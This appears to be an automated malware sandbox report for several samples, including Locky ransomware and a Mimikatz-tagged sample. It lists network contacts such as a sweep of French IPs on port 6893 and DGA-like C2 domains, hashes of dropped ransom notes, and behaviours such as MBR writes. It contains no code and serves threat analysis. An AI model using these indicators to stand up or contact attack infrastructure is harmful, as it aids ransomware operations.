| FR | 178.33.162.32:6893 | udp | |
| FR | 178.33.162.33:6893 | udp | |
| FR | 178.33.162.34:6893 | udp | |
| FR | 178.33.162.35:6893 | udp | |
| FR | 178.33.162.36:6893 | udp | |
| FR | 178.33.162.37:6893 | udp | |
| FR | 178.33.162.38:6893 | udp | |
| FR | 178.33.162.39:6893 | udp | |
| FR | 178.33.162.40:6893 | udp | |
| FR | 178.33.162.41:6893 | udp | |
| FR | 178.33.162.42:6893 | udp | |
| FR | 178.33.162.43:6893 | udp | |
| FR | 178.33.162.44:6893 | udp | |
| FR | 178.33.162.45:6893 | udp | |
| FR | 178.33.162.46:6893 | udp | |
| FR | 178.33.162.47:6893 | udp | |
| FR | 178.33.162.48:6893 | udp | |
| FR | 178.33.162.49:6893 | udp | |
| FR | 178.33.162.50:6893 | udp | |
| FR | 178.33.162.51:6893 | udp | |
| FR | 178.33.162.52:6893 | udp | |
| FR | 178.33.162.53:6893 | udp | |
| FR | 178.33.162.54:6893 | udp | |
| FR | 178.33.162.55:6893 | udp | |
| FR | 178.33.162.56:6893 | udp | |
| FR | 178.33.162.57:6893 | udp | |
| FR | 178.33.162.58:6893 | udp | |
| FR | 178.33.162.59:6893 | udp | |
| FR | 178.33.162.60:6893 | udp | |
| FR | 178.33.162.61:6893 | udp | |
| FR | 178.33.162.62:6893 | udp | |
| FR | 178.33.162.63:6893 | udp | |
| FR | 178.33.162.64:6893 | udp | |
| FR | 178.33.162.65:6893 | udp | |
| FR | 178.33.162.66:6893 | udp | |
| FR | 178.33.162.67:6893 | udp | |
| FR | 178.33.162.68:6893 | udp | |
| FR | 178.33.162.69:6893 | udp | |
| FR | 178.33.162.70:6893 | udp | |
| FR | 178.33.162.71:6893 | udp | |
| FR | 178.33.162.72:6893 | udp | |
| FR | 178.33.162.73:6893 | udp | |
| FR | 178.33.162.74:6893 | udp | |
| FR | 178.33.162.75:6893 | udp | |
| FR | 178.33.162.76:6893 | udp | |
| FR | 178.33.162.77:6893 | udp | |
| FR | 178.33.162.78:6893 | udp | |
| FR | 178.33.162.79:6893 | udp | |
| FR | 178.33.162.80:6893 | udp | |
| FR | 178.33.162.81:6893 | udp | |
| FR | 178.33.162.82:6893 | udp | |
| FR | 178.33.162.83:6893 | udp | |
| FR | 178.33.162.84:6893 | udp | |
| FR | 178.33.162.85:6893 | udp | |
| FR | 178.33.162.86:6893 | udp | |
| FR | 178.33.162.87:6893 | udp | |
| FR | 178.33.162.88:6893 | udp | |
| FR | 178.33.162.89:6893 | udp | |
| FR | 178.33.162.90:6893 | udp | |
| FR | 178.33.162.91:6893 | udp | |
| FR | 178.33.162.92:6893 | udp | |
| FR | 178.33.162.93:6893 | udp | |
| FR | 178.33.162.94:6893 | udp | |
| FR | 178.33.162.95:6893 | udp | |
| FR | 178.33.162.96:6893 | udp | |
| FR | 178.33.162.97:6893 | udp | |
| FR | 178.33.162.98:6893 | udp | |
| FR | 178.33.162.99:6893 | udp | |
| FR | 178.33.162.100:6893 | udp | |
| FR | 178.33.162.101:6893 | udp | |
| FR | 178.33.162.102:6893 | udp | |
| FR | 178.33.162.103:6893 | udp | |
| FR | 178.33.162.104:6893 | udp | |
| FR | 178.33.162.105:6893 | udp | |
| FR | 178.33.162.106:6893 | udp | |
| FR | 178.33.162.107:6893 | udp | |
| FR | 178.33.162.108:6893 | udp | |
| FR | 178.33.162.109:6893 | udp | |
| FR | 178.33.162.110:6893 | udp | |
| FR | 178.33.162.111:6893 | udp | |
| FR | 178.33.162.112:6893 | udp | |
| FR | 178.33.162.113:6893 | udp | |
| FR | 178.33.162.114:6893 | udp | |
| FR | 178.33.162.115:6893 | udp | |
| FR | 178.33.162.116:6893 | udp | |
| FR | 178.33.162.117:6893 | udp | |
| FR | 178.33.162.118:6893 | udp | |
| FR | 178.33.162.119:6893 | udp | |
| FR | 178.33.162.120:6893 | udp | |
| FR | 178.33.162.121:6893 | udp | |
| FR | 178.33.162.122:6893 | udp | |
| FR | 178.33.162.123:6893 | udp | |
| FR | 178.33.162.124:6893 | udp | |
| FR | 178.33.162.125:6893 | udp | |
| FR | 178.33.162.126:6893 | udp | |
| FR | 178.33.162.127:6893 | udp | |
| FR | 178.33.162.128:6893 | udp | |
| FR | 178.33.162.129:6893 | udp | |
| FR | 178.33.162.130:6893 | udp | |
| FR | 178.33.162.131:6893 | udp | |
| FR | 178.33.162.132:6893 | udp | |
| FR | 178.33.162.133:6893 | udp | |
| FR | 178.33.162.134:6893 | udp | |
| FR | 178.33.162.135:6893 | udp | |
| FR | 178.33.162.136:6893 | udp | |
| FR | 178.33.162.137:6893 | udp | |
| FR | 178.33.162.138:6893 | udp | |
| FR | 178.33.162.139:6893 | udp | |
| FR | 178.33.162.140:6893 | udp | |
| FR | 178.33.162.141:6893 | udp | |
| FR | 178.33.162.142:6893 | udp | |
| FR | 178.33.162.143:6893 | udp | |
| FR | 178.33.162.144:6893 | udp | |
| FR | 178.33.162.145:6893 | udp | |
| FR | 178.33.162.146:6893 | udp | |
| FR | 178.33.162.147:6893 | udp | |
| FR | 178.33.162.148:6893 | udp | |
| FR | 178.33.162.149:6893 | udp | |
| FR | 178.33.162.150:6893 | udp | |
| FR | 178.33.162.151:6893 | udp | |
| FR | 178.33.162.152:6893 | udp | |
| FR | 178.33.162.153:6893 | udp | |
| FR | 178.33.162.154:6893 | udp | |
| FR | 178.33.162.155:6893 | udp | |
| FR | 178.33.162.156:6893 | udp | |
| FR | 178.33.162.157:6893 | udp | |
| FR | 178.33.162.158:6893 | udp | |
| FR | 178.33.162.159:6893 | udp | |
| FR | 178.33.162.160:6893 | udp | |
| FR | 178.33.162.161:6893 | udp | |
| FR | 178.33.162.162:6893 | udp | |
| FR | 178.33.162.163:6893 | udp | |
| FR | 178.33.162.164:6893 | udp | |
| FR | 178.33.162.165:6893 | udp | |
| FR | 178.33.162.166:6893 | udp | |
| FR | 178.33.162.167:6893 | udp | |
| FR | 178.33.162.168:6893 | udp | |
| FR | 178.33.162.169:6893 | udp | |
| FR | 178.33.162.170:6893 | udp | |
| FR | 178.33.162.171:6893 | udp | |
| FR | 178.33.162.172:6893 | udp | |
| FR | 178.33.162.173:6893 | udp | |
| FR | 178.33.162.174:6893 | udp | |
| FR | 178.33.162.175:6893 | udp | |
| FR | 178.33.162.176:6893 | udp | |
| FR | 178.33.162.177:6893 | udp | |
| FR | 178.33.162.178:6893 | udp | |
| FR | 178.33.162.179:6893 | udp | |
| FR | 178.33.162.180:6893 | udp | |
| FR | 178.33.162.181:6893 | udp | |
| FR | 178.33.162.182:6893 | udp | |
| FR | 178.33.162.183:6893 | udp | |
| FR | 178.33.162.184:6893 | udp | |
| FR | 178.33.162.185:6893 | udp | |
| FR | 178.33.162.186:6893 | udp | |
| FR | 178.33.162.187:6893 | udp | |
| FR | 178.33.162.188:6893 | udp | |
| FR | 178.33.162.189:6893 | udp | |
| FR | 178.33.162.190:6893 | udp | |
| FR | 178.33.162.191:6893 | udp | |
| FR | 178.33.162.192:6893 | udp | |
| FR | 178.33.162.193:6893 | udp | |
| FR | 178.33.162.194:6893 | udp | |
| FR | 178.33.162.195:6893 | udp | |
| FR | 178.33.162.196:6893 | udp | |
| FR | 178.33.162.197:6893 | udp | |
| FR | 178.33.162.198:6893 | udp | |
| FR | 178.33.162.199:6893 | udp | |
| FR | 178.33.162.200:6893 | udp | |
| FR | 178.33.162.201:6893 | udp | |
| FR | 178.33.162.202:6893 | udp | |
| FR | 178.33.162.203:6893 | udp | |
| FR | 178.33.162.204:6893 | udp | |
| FR | 178.33.162.205:6893 | udp | |
| FR | 178.33.162.206:6893 | udp | |
| FR | 178.33.162.207:6893 | udp | |
| FR | 178.33.162.208:6893 | udp | |
| FR | 178.33.162.209:6893 | udp | |
| FR | 178.33.162.210:6893 | udp | |
| FR | 178.33.162.211:6893 | udp | |
| FR | 178.33.162.212:6893 | udp | |
| FR | 178.33.162.213:6893 | udp | |
| FR | 178.33.162.214:6893 | udp | |
| FR | 178.33.162.215:6893 | udp | |
| FR | 178.33.162.216:6893 | udp | |
| FR | 178.33.162.217:6893 | udp | |
| FR | 178.33.162.218:6893 | udp | |
| FR | 178.33.162.219:6893 | udp | |
| FR | 178.33.162.220:6893 | udp | |
| FR | 178.33.162.221:6893 | udp | |
| FR | 178.33.162.222:6893 | udp | |
| FR | 178.33.162.223:6893 | udp | |
| FR | 178.33.162.224:6893 | udp | |
| FR | 178.33.162.225:6893 | udp | |
| FR | 178.33.162.226:6893 | udp | |
| FR | 178.33.162.227:6893 | udp | |
| FR | 178.33.162.228:6893 | udp | |
| FR | 178.33.162.229:6893 | udp | |
| FR | 178.33.162.230:6893 | udp | |
| FR | 178.33.162.231:6893 | udp | |
| FR | 178.33.162.232:6893 | udp | |
| FR | 178.33.162.233:6893 | udp | |
| FR | 178.33.162.234:6893 | udp | |
| FR | 178.33.162.235:6893 | udp | |
| FR | 178.33.162.236:6893 | udp | |
| FR | 178.33.162.237:6893 | udp | |
| FR | 178.33.162.238:6893 | udp | |
| FR | 178.33.162.239:6893 | udp | |
| FR | 178.33.162.240:6893 | udp | |
| FR | 178.33.162.241:6893 | udp | |
| FR | 178.33.162.242:6893 | udp | |
| FR | 178.33.162.243:6893 | udp | |
| FR | 178.33.162.244:6893 | udp | |
| FR | 178.33.162.245:6893 | udp | |
| FR | 178.33.162.246:6893 | udp | |
| FR | 178.33.162.247:6893 | udp | |
| FR | 178.33.162.248:6893 | udp | |
| FR | 178.33.162.249:6893 | udp | |
| FR | 178.33.162.250:6893 | udp | |
| FR | 178.33.162.251:6893 | udp | |
| FR | 178.33.162.252:6893 | udp | |
| FR | 178.33.162.253:6893 | udp | |
| FR | 178.33.162.254:6893 | udp | |
| FR | 178.33.162.255:6893 | udp | |
| FR | 178.33.163.0:6893 | udp | |
| FR | 178.33.163.1:6893 | udp | |
| FR | 178.33.163.2:6893 | udp | |
| FR | 178.33.163.3:6893 | udp | |
| FR | 178.33.163.4:6893 | udp | |
| FR | 178.33.163.5:6893 | udp | |
| FR | 178.33.163.6:6893 | udp | |
| FR | 178.33.163.7:6893 | udp | |
| FR | 178.33.163.8:6893 | udp | |
| FR | 178.33.163.9:6893 | udp | |
| FR | 178.33.163.10:6893 | udp | |
| FR | 178.33.163.11:6893 | udp | |
| FR | 178.33.163.12:6893 | udp | |
| FR | 178.33.163.13:6893 | udp | |
| FR | 178.33.163.14:6893 | udp | |
| FR | 178.33.163.15:6893 | udp | |
| FR | 178.33.163.16:6893 | udp | |
| FR | 178.33.163.17:6893 | udp | |
| FR | 178.33.163.18:6893 | udp | |
| FR | 178.33.163.19:6893 | udp | |
| FR | 178.33.163.20:6893 | udp | |
| FR | 178.33.163.21:6893 | udp | |
| FR | 178.33.163.22:6893 | udp | |
| FR | 178.33.163.23:6893 | udp | |
| FR | 178.33.163.24:6893 | udp | |
| FR | 178.33.163.25:6893 | udp | |
| FR | 178.33.163.26:6893 | udp | |
| FR | 178.33.163.27:6893 | udp | |
| FR | 178.33.163.28:6893 | udp | |
| FR | 178.33.163.29:6893 | udp | |
| FR | 178.33.163.30:6893 | udp | |
| FR | 178.33.163.31:6893 | udp | |
| FR | 178.33.163.32:6893 | udp | |
| FR | 178.33.163.33:6893 | udp | |
| FR | 178.33.163.34:6893 | udp | |
| FR | 178.33.163.35:6893 | udp | |
| FR | 178.33.163.36:6893 | udp | |
| FR | 178.33.163.37:6893 | udp | |
| FR | 178.33.163.38:6893 | udp | |
| FR | 178.33.163.39:6893 | udp | |
| FR | 178.33.163.40:6893 | udp | |
| FR | 178.33.163.41:6893 | udp | |
| FR | 178.33.163.42:6893 | udp | |
| FR | 178.33.163.43:6893 | udp | |
| FR | 178.33.163.44:6893 | udp | |
| FR | 178.33.163.45:6893 | udp | |
| FR | 178.33.163.46:6893 | udp | |
| FR | 178.33.163.47:6893 | udp | |
| FR | 178.33.163.48:6893 | udp | |
| FR | 178.33.163.49:6893 | udp | |
| FR | 178.33.163.50:6893 | udp | |
| FR | 178.33.163.51:6893 | udp | |
| FR | 178.33.163.52:6893 | udp | |
| FR | 178.33.163.53:6893 | udp | |
| FR | 178.33.163.54:6893 | udp | |
| FR | 178.33.163.55:6893 | udp | |
| FR | 178.33.163.56:6893 | udp | |
| FR | 178.33.163.57:6893 | udp | |
| FR | 178.33.163.58:6893 | udp | |
| FR | 178.33.163.59:6893 | udp | |
| FR | 178.33.163.60:6893 | udp | |
| FR | 178.33.163.61:6893 | udp | |
| FR | 178.33.163.62:6893 | udp | |
| FR | 178.33.163.63:6893 | udp | |
| FR | 178.33.163.64:6893 | udp | |
| FR | 178.33.163.65:6893 | udp | |
| FR | 178.33.163.66:6893 | udp | |
| FR | 178.33.163.67:6893 | udp | |
| FR | 178.33.163.68:6893 | udp | |
| FR | 178.33.163.69:6893 | udp | |
| FR | 178.33.163.70:6893 | udp | |
| FR | 178.33.163.71:6893 | udp | |
| FR | 178.33.163.72:6893 | udp | |
| FR | 178.33.163.73:6893 | udp | |
| FR | 178.33.163.74:6893 | udp | |
| FR | 178.33.163.75:6893 | udp | |
| FR | 178.33.163.76:6893 | udp | |
| FR | 178.33.163.77:6893 | udp | |
| FR | 178.33.163.78:6893 | udp | |
| FR | 178.33.163.79:6893 | udp | |
| FR | 178.33.163.80:6893 | udp | |
| FR | 178.33.163.81:6893 | udp | |
| FR | 178.33.163.82:6893 | udp | |
| FR | 178.33.163.83:6893 | udp | |
| FR | 178.33.163.84:6893 | udp | |
| FR | 178.33.163.85:6893 | udp | |
| FR | 178.33.163.86:6893 | udp | |
| FR | 178.33.163.87:6893 | udp | |
| FR | 178.33.163.88:6893 | udp | |
| FR | 178.33.163.89:6893 | udp | |
| FR | 178.33.163.90:6893 | udp | |
| FR | 178.33.163.91:6893 | udp | |
| FR | 178.33.163.92:6893 | udp | |
| FR | 178.33.163.93:6893 | udp | |
| FR | 178.33.163.94:6893 | udp | |
| FR | 178.33.163.95:6893 | udp | |
| FR | 178.33.163.96:6893 | udp | |
| FR | 178.33.163.97:6893 | udp | |
| FR | 178.33.163.98:6893 | udp | |
| FR | 178.33.163.99:6893 | udp | |
| FR | 178.33.163.100:6893 | udp | |
| FR | 178.33.163.101:6893 | udp | |
| FR | 178.33.163.102:6893 | udp | |
| FR | 178.33.163.103:6893 | udp | |
| FR | 178.33.163.104:6893 | udp | |
| FR | 178.33.163.105:6893 | udp | |
| FR | 178.33.163.106:6893 | udp | |
| FR | 178.33.163.107:6893 | udp | |
| FR | 178.33.163.108:6893 | udp | |
| FR | 178.33.163.109:6893 | udp | |
| FR | 178.33.163.110:6893 | udp | |
| FR | 178.33.163.111:6893 | udp | |
| FR | 178.33.163.112:6893 | udp | |
| FR | 178.33.163.113:6893 | udp | |
| FR | 178.33.163.114:6893 | udp | |
| FR | 178.33.163.115:6893 | udp | |
| FR | 178.33.163.116:6893 | udp | |
| FR | 178.33.163.117:6893 | udp | |
| FR | 178.33.163.118:6893 | udp | |
| FR | 178.33.163.119:6893 | udp | |
| FR | 178.33.163.120:6893 | udp | |
| FR | 178.33.163.121:6893 | udp | |
| FR | 178.33.163.122:6893 | udp | |
| FR | 178.33.163.123:6893 | udp | |
| FR | 178.33.163.124:6893 | udp | |
| FR | 178.33.163.125:6893 | udp | |
| FR | 178.33.163.126:6893 | udp | |
| FR | 178.33.163.127:6893 | udp | |
| FR | 178.33.163.128:6893 | udp | |
| FR | 178.33.163.129:6893 | udp | |
| FR | 178.33.163.130:6893 | udp | |
| FR | 178.33.163.131:6893 | udp | |
| FR | 178.33.163.132:6893 | udp | |
| FR | 178.33.163.133:6893 | udp | |
| FR | 178.33.163.134:6893 | udp | |
| FR | 178.33.163.135:6893 | udp | |
| FR | 178.33.163.136:6893 | udp | |
| FR | 178.33.163.137:6893 | udp | |
| FR | 178.33.163.138:6893 | udp | |
| FR | 178.33.163.139:6893 | udp | |
| FR | 178.33.163.140:6893 | udp | |
| FR | 178.33.163.141:6893 | udp | |
| FR | 178.33.163.142:6893 | udp | |
| FR | 178.33.163.143:6893 | udp | |
| FR | 178.33.163.144:6893 | udp | |
| FR | 178.33.163.145:6893 | udp | |
| FR | 178.33.163.146:6893 | udp | |
| FR | 178.33.163.147:6893 | udp | |
| FR | 178.33.163.148:6893 | udp | |
| FR | 178.33.163.149:6893 | udp | |
| FR | 178.33.163.150:6893 | udp | |
| FR | 178.33.163.151:6893 | udp | |
| FR | 178.33.163.152:6893 | udp | |
| FR | 178.33.163.153:6893 | udp | |
| FR | 178.33.163.154:6893 | udp | |
| FR | 178.33.163.155:6893 | udp | |
| FR | 178.33.163.156:6893 | udp | |
| FR | 178.33.163.157:6893 | udp | |
| FR | 178.33.163.158:6893 | udp | |
| FR | 178.33.163.159:6893 | udp | |
| FR | 178.33.163.160:6893 | udp | |
| FR | 178.33.163.161:6893 | udp | |
| FR | 178.33.163.162:6893 | udp | |
| FR | 178.33.163.163:6893 | udp | |
| FR | 178.33.163.164:6893 | udp | |
| FR | 178.33.163.165:6893 | udp | |
| FR | 178.33.163.166:6893 | udp | |
| FR | 178.33.163.167:6893 | udp | |
| FR | 178.33.163.168:6893 | udp | |
| FR | 178.33.163.169:6893 | udp | |
| FR | 178.33.163.170:6893 | udp | |
| FR | 178.33.163.171:6893 | udp | |
| FR | 178.33.163.172:6893 | udp | |
| FR | 178.33.163.173:6893 | udp | |
| FR | 178.33.163.174:6893 | udp | |
| FR | 178.33.163.175:6893 | udp | |
| FR | 178.33.163.176:6893 | udp | |
| FR | 178.33.163.177:6893 | udp | |
| FR | 178.33.163.178:6893 | udp | |
| FR | 178.33.163.179:6893 | udp | |
| FR | 178.33.163.180:6893 | udp | |
| FR | 178.33.163.181:6893 | udp | |
| FR | 178.33.163.182:6893 | udp | |
| FR | 178.33.163.183:6893 | udp | |
| FR | 178.33.163.184:6893 | udp | |
| FR | 178.33.163.185:6893 | udp | |
| FR | 178.33.163.186:6893 | udp | |
| FR | 178.33.163.187:6893 | udp | |
| FR | 178.33.163.188:6893 | udp | |
| FR | 178.33.163.189:6893 | udp | |
| FR | 178.33.163.190:6893 | udp | |
| FR | 178.33.163.191:6893 | udp | |
| FR | 178.33.163.192:6893 | udp | |
| FR | 178.33.163.193:6893 | udp | |
| FR | 178.33.163.194:6893 | udp | |
| FR | 178.33.163.195:6893 | udp | |
| FR | 178.33.163.196:6893 | udp | |
| FR | 178.33.163.197:6893 | udp | |
| FR | 178.33.163.198:6893 | udp | |
| FR | 178.33.163.199:6893 | udp | |
| FR | 178.33.163.200:6893 | udp | |
| FR | 178.33.163.201:6893 | udp | |
| FR | 178.33.163.202:6893 | udp | |
| FR | 178.33.163.203:6893 | udp | |
| FR | 178.33.163.204:6893 | udp | |
| FR | 178.33.163.205:6893 | udp | |
| FR | 178.33.163.206:6893 | udp | |
| FR | 178.33.163.207:6893 | udp | |
| FR | 178.33.163.208:6893 | udp | |
| FR | 178.33.163.209:6893 | udp | |
| FR | 178.33.163.210:6893 | udp | |
| FR | 178.33.163.211:6893 | udp | |
| FR | 178.33.163.212:6893 | udp | |
| FR | 178.33.163.213:6893 | udp | |
| FR | 178.33.163.214:6893 | udp | |
| FR | 178.33.163.215:6893 | udp | |
| FR | 178.33.163.216:6893 | udp | |
| FR | 178.33.163.217:6893 | udp | |
| FR | 178.33.163.218:6893 | udp | |
| FR | 178.33.163.219:6893 | udp | |
| FR | 178.33.163.220:6893 | udp | |
| FR | 178.33.163.221:6893 | udp | |
| FR | 178.33.163.222:6893 | udp | |
| FR | 178.33.163.223:6893 | udp | |
| FR | 178.33.163.224:6893 | udp | |
| FR | 178.33.163.225:6893 | udp | |
| FR | 178.33.163.226:6893 | udp | |
| FR | 178.33.163.227:6893 | udp | |
| FR | 178.33.163.228:6893 | udp | |
| FR | 178.33.163.229:6893 | udp | |
| FR | 178.33.163.230:6893 | udp | |
| FR | 178.33.163.231:6893 | udp | |
| FR | 178.33.163.232:6893 | udp | |
| FR | 178.33.163.233:6893 | udp | |
| FR | 178.33.163.234:6893 | udp | |
| FR | 178.33.163.235:6893 | udp | |
| FR | 178.33.163.236:6893 | udp | |
| FR | 178.33.163.237:6893 | udp | |
| FR | 178.33.163.238:6893 | udp | |
| FR | 178.33.163.239:6893 | udp | |
| FR | 178.33.163.240:6893 | udp | |
| FR | 178.33.163.241:6893 | udp | |
| FR | 178.33.163.242:6893 | udp | |
| FR | 178.33.163.243:6893 | udp | |
| FR | 178.33.163.244:6893 | udp | |
| FR | 178.33.163.245:6893 | udp | |
| FR | 178.33.163.246:6893 | udp | |
| FR | 178.33.163.247:6893 | udp | |
| FR | 178.33.163.248:6893 | udp | |
| FR | 178.33.163.249:6893 | udp | |
| FR | 178.33.163.250:6893 | udp | |
| FR | 178.33.163.251:6893 | udp | |
| FR | 178.33.163.252:6893 | udp | |
| FR | 178.33.163.253:6893 | udp | |
| FR | 178.33.163.254:6893 | udp | |
| FR | 178.33.163.255:6893 | udp | |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/428-0-0x0000000002210000-0x0000000002241000-memory.dmp
memory/428-1-0x0000000000400000-0x0000000000435000-memory.dmp
memory/428-2-0x0000000000400000-0x0000000000435000-memory.dmp
memory/428-4-0x0000000000400000-0x0000000000435000-memory.dmp
memory/428-7-0x0000000000400000-0x0000000000435000-memory.dmp
memory/428-11-0x0000000000400000-0x0000000000435000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___OO7EZK42_.txt
| MD5 | 9ac898cf0aaa69be9fc86600fc2082ac |
| SHA1 | 2bab2405c48e7fece90a14d840f33252ced09c08 |
| SHA256 | ed25a3cb729102a8ae8c1fe533c9348b7aebacfc0adf433cab7cfc8c0cf0f8d2 |
| SHA512 | 1561e57addf3fbf330168ed370428d8e580bcb4323c8f5417c02f96e7f0406fcb526808781f5a7c92f226639646613613ea1af6f9b084190e098de1591d7f2f7 |
C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___6T95GWH_.hta
| MD5 | bd44e1648a4fb5b3312f03395d917093 |
| SHA1 | 68a196647b1b782601057c109c1cbc6ce9efef03 |
| SHA256 | 570ed2c6a1fedfb2a8a526b6a2fa05232c7450e38596d639c536490986d214bc |
| SHA512 | 0b57e1fff52b2261ad9ecff5985cef0e04b901ba44bbf60f8a042c7f74cfa14581d88698e823fab3549159a98503c79d7887899c4a5ae0383f5951b749c701b0 |
memory/428-335-0x0000000000400000-0x0000000000435000-memory.dmp
memory/428-364-0x0000000000400000-0x0000000000435000-memory.dmp
memory/428-365-0x0000000000440000-0x0000000000451000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
149s
Command Line
Signatures
Locky
Locky family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Locky.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Locky.exe
"C:\Users\Admin\AppData\Local\Temp\Locky.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | weaaspoo.in | udp |
| US | 8.8.8.8:53 | ktwmpwuncbi.fr | udp |
| US | 8.8.8.8:53 | cjpqsuatmo.tf | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | embavssrrfvukl.in | udp |
| US | 8.8.8.8:53 | rcbquc.ru | udp |
| US | 8.8.8.8:53 | frxdrjrjd.de | udp |
| US | 8.8.8.8:53 | weaaspoo.in | udp |
| US | 8.8.8.8:53 | ktwmpwuncbi.fr | udp |
| US | 8.8.8.8:53 | cjpqsuatmo.tf | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | embavssrrfvukl.in | udp |
| US | 8.8.8.8:53 | rcbquc.ru | udp |
| US | 8.8.8.8:53 | frxdrjrjd.de | udp |
| US | 8.8.8.8:53 | weaaspoo.in | udp |
| US | 8.8.8.8:53 | ktwmpwuncbi.fr | udp |
| US | 8.8.8.8:53 | cjpqsuatmo.tf | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | embavssrrfvukl.in | udp |
| US | 8.8.8.8:53 | rcbquc.ru | udp |
| US | 8.8.8.8:53 | frxdrjrjd.de | udp |
| US | 8.8.8.8:53 | weaaspoo.in | udp |
| US | 8.8.8.8:53 | ktwmpwuncbi.fr | udp |
| US | 8.8.8.8:53 | cjpqsuatmo.tf | udp |
| IE | 86.104.134.144:80 | tcp |
Files
memory/3160-0-0x0000000000870000-0x0000000000874000-memory.dmp
memory/3160-1-0x0000000000870000-0x0000000000874000-memory.dmp
memory/3160-2-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/3160-4-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/3160-6-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/3160-7-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/3160-9-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/3160-13-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/3160-15-0x0000000000400000-0x00000000007D1000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20240903-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Mimikatz
Mimikatz family
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B4A.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASK.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OSPP.VBS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\NOTE.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
